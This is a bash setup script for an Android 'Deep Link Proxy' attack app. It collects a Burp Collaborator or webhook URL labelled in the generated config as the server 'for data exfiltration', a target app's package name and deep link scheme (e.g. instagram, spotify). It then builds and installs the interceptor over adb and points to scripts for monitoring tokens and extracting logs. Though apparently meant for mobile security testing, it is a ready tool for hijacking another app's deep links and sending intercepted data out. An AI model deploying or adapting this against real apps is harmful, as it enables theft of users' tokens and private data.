#!/bin/bash

# Deep Link Proxy - Quick Setup Script
# This script helps configure the proxy for a target app

set -e

echo "═══════════════════════════════════════════════════════════════"
echo "🔗 Deep Link Proxy - Quick Setup"
echo "═══════════════════════════════════════════════════════════════"
echo ""

CONFIG_FILE="app/src/main/res/values/config.xml"

# Check if config file exists
if [ ! -f "$CONFIG_FILE" ]; then
    echo "❌ Error: Config file not found at $CONFIG_FILE"
    exit 1
fi

echo "This script will help you configure the proxy."
echo ""

# Get server URL
echo "📡 Step 1: Server Configuration"
echo "──────────────────────────────────────────────────────────────"
echo "Enter your Burp Collaborator or webhook URL:"
echo "Examples:"
echo "  - https://abc123.oastify.com"
echo "  - https://webhook.site/unique-id"
echo "  - https://requestbin.com/your-bin"
echo ""
read -p "Server URL: " SERVER_URL

if [ -z "$SERVER_URL" ]; then
    echo "❌ Server URL cannot be empty!"
    exit 1
fi

# Get target package
echo ""
echo "📱 Step 2: Target App Configuration"
echo "──────────────────────────────────────────────────────────────"
echo "Enter the target app's package name:"
echo ""
echo "💡 Tip: Find it with: adb shell pm list packages | grep KEYWORD"
echo ""
read -p "Target Package: " TARGET_PACKAGE

if [ -z "$TARGET_PACKAGE" ]; then
    echo "❌ Target package cannot be empty!"
    exit 1
fi

# Get deep link scheme
echo ""
echo "🔗 Step 3: Deep Link Scheme"
echo "──────────────────────────────────────────────────────────────"
echo "Enter the deep link scheme to intercept:"
echo "Examples: instagram, spotify, myapp, etc."
echo ""
read -p "Scheme: " DEEP_LINK_SCHEME

if [ -z "$DEEP_LINK_SCHEME" ]; then
    echo "❌ Scheme cannot be empty!"
    exit 1
fi

# Optional settings
echo ""
echo "⚙️  Step 4: Optional Settings (press Enter for defaults)"
echo "──────────────────────────────────────────────────────────────"

read -p "Forward delay in milliseconds [1000]: " FORWARD_DELAY
FORWARD_DELAY=${FORWARD_DELAY:-1000}

read -p "Enable local logging? (true/false) [true]: " ENABLE_LOGGING
ENABLE_LOGGING=${ENABLE_LOGGING:-true}

read -p "Show debug toasts? (true/false) [false]: " SHOW_TOASTS
SHOW_TOASTS=${SHOW_TOASTS:-false}

# Update config.xml
echo ""
echo "📝 Updating configuration..."

cat > "$CONFIG_FILE" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<resources>
    <!-- 
    ═══════════════════════════════════════════════════════════════════════
    Deep Link Proxy Configuration
    Generated by setup.sh on $(date)
    ═══════════════════════════════════════════════════════════════════════
    -->
    
    <!-- Server URL for data exfiltration -->
    <string name="server_url">$SERVER_URL</string>
    
    <!-- Target app package name -->
    <string name="target_package">$TARGET_PACKAGE</string>
    
    <!-- Deep link scheme to intercept -->
    <string name="deep_link_scheme">$DEEP_LINK_SCHEME</string>
    
    <!-- Optional Settings -->
    <integer name="forward_delay_ms">$FORWARD_DELAY</integer>
    <bool name="enable_local_logging">$ENABLE_LOGGING</bool>
    <bool name="show_debug_toasts">$SHOW_TOASTS</bool>
</resources>
EOF

echo "✅ Configuration updated!"
echo ""

# Summary
echo "═══════════════════════════════════════════════════════════════"
echo "📋 Configuration Summary"
echo "═══════════════════════════════════════════════════════════════"
echo "Server URL:       $SERVER_URL"
echo "Target Package:   $TARGET_PACKAGE"
echo "Scheme:           $DEEP_LINK_SCHEME"
echo "Forward Delay:    ${FORWARD_DELAY}ms"
echo "Local Logging:    $ENABLE_LOGGING"
echo "Debug Toasts:     $SHOW_TOASTS"
echo "═══════════════════════════════════════════════════════════════"
echo ""

# Ask if user wants to build
read -p "🔨 Build and install now? (y/n): " BUILD_NOW

if [ "$BUILD_NOW" = "y" ] || [ "$BUILD_NOW" = "Y" ]; then
    echo ""
    echo "🔨 Building APK..."
    ./gradlew assembleDebug
    
    echo ""
    echo "📱 Installing to device..."
    adb install -r app/build/outputs/apk/debug/app-debug.apk
    
    echo ""
    echo "✅ Installation complete!"
    echo ""
    echo "🎯 Test with:"
    echo "   adb shell am start -a android.intent.action.VIEW -d \"$DEEP_LINK_SCHEME://test\""
else
    echo ""
    echo "To build and install manually:"
    echo "  ./gradlew assembleDebug"
    echo "  adb install -r app/build/outputs/apk/debug/app-debug.apk"
fi

echo ""
echo "═══════════════════════════════════════════════════════════════"
echo "✅ Setup Complete!"
echo "═══════════════════════════════════════════════════════════════"
echo ""
echo "📚 Next steps:"
echo "  1. Test deep link: ./test_deeplink.sh $DEEP_LINK_SCHEME://test"
echo "  2. Monitor logs: ./monitor_tokens.sh"
echo "  3. Extract data: ./extract_logs.sh"
echo ""
echo "📖 For more info, see README.md and CONFIG.md"
echo ""

